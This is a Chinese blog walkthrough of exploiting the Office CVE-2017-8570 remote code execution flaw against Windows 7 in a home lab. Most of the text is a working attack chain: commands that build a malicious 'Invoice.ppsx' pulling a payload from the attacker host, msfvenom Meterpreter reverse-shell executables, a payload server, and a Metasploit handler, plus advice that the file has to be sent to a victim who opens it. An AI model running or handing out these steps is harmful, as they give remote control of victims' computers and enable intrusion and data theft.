您的位置:首页 > 编程语言

Office CVE-2017-8570远程代码执行漏洞复现

2018-01-12 14:51 1041 查看

漏洞影响版本

很尴尬,此页无图

Microsoft Office 2007 Service Pack 3

Microsoft Office 2010 Service Pack 2 (32-bit editions)

Microsoft Office 2010 Service Pack 2 (64-bit editions)

Microsoft Office 2013 RT Service Pack 1

Microsoft Office 2013 Service Pack 1 (32-bit editions)

Microsoft Office 2013 Service Pack 1 (64-bit editions)

Microsoft Office 2016 (32-bit edition)<
4000
/div>

Microsoft Office 2016 (64-bit edition)

复现环境:

攻击机:系统:kallinux 32位 IP:192.168.1.194 metasploit

目标机:系统:window7旗舰版 IP:192.168.1.133 Microsoft Office 2013

1、生成恶意文件:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.194/logo.doc
1、这里的IP是攻击机IP

2、Invoice.ppsx为生成的恶意文件

3、这里可能会报一个错误:

IOError: [Errno 2] No such file or directory: 'template/template.ppsx'

这里郁闷了很久,各种查资料,才知道这里是文件中的一个路径有问题!

在文件cve-2017-8570_toolkit.py中有一个文件路径需要修改:

修改后为此文件(template.ppsx)所在路径:

如我现在的文件为/root/Office8570-master/文件夹下,所以修改成:

接下来执行第一步生成恶意文件命令就不会报错了!

生成的恶意文件:

2、生成反弹shell文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.194 LPORT=6666 -f exe > shell.exe

设置反弹shell的ip192.168.1.194,和监听端口6666

命令执行成功:

生成的shell文件

当然了,如果目标机是64位机器那么需要执行不一样的命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell64.exe

命令执行成功

生成shell64文件

3、监听会话(来自ppsx执行反弹shell)

执行命令(32位目标机):

python cve-2017-8570_toolkit.py -M exp -e http://192.168.1.194/shell.exe -l shell.exe

过脚本在80端口监听,等待接收ppsx请求并下载执行的反弹木马

命令执行成功监听服务启动:

接下来进入Metasploit,新建一个Kali 192.168.1.194的连接,设置相关参数,接受返回的Shell:

Msfconsole

msfconsole

msf > use exploit/multi/handler

msf > set LHOST 192.168.1.194

msf > set LPORT 6666

msf > set PAYLOAD windows/meterpreter/reverse_tcp

msf > exploit

同样,这里攻击64位操作系统的时候,需执行如下命令(这里我没有执行):

msf > set pauload windows/x64/meterpreter/reverse_tcp

4、漏洞执行

最后将我们生成好的恶意文件发送给目标机,并让目标机打开文件。我这里是kalinux运行在虚拟机中,所以讲恶意文件直接拖到win7中,然后执行文件就行了。

文件运行(如果将文件发给别人,必须要让别人打开此文件,否则不可成功,另外图没有截好T_T)

Shell反弹显示get到了目标机

然后再meterpreter中可以直接执行ls命令,如下:

可见win7桌面上的文件:

我们还可以直接执行shell命令,那么就可以直接执行win7下的DOS命令了:
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  漏洞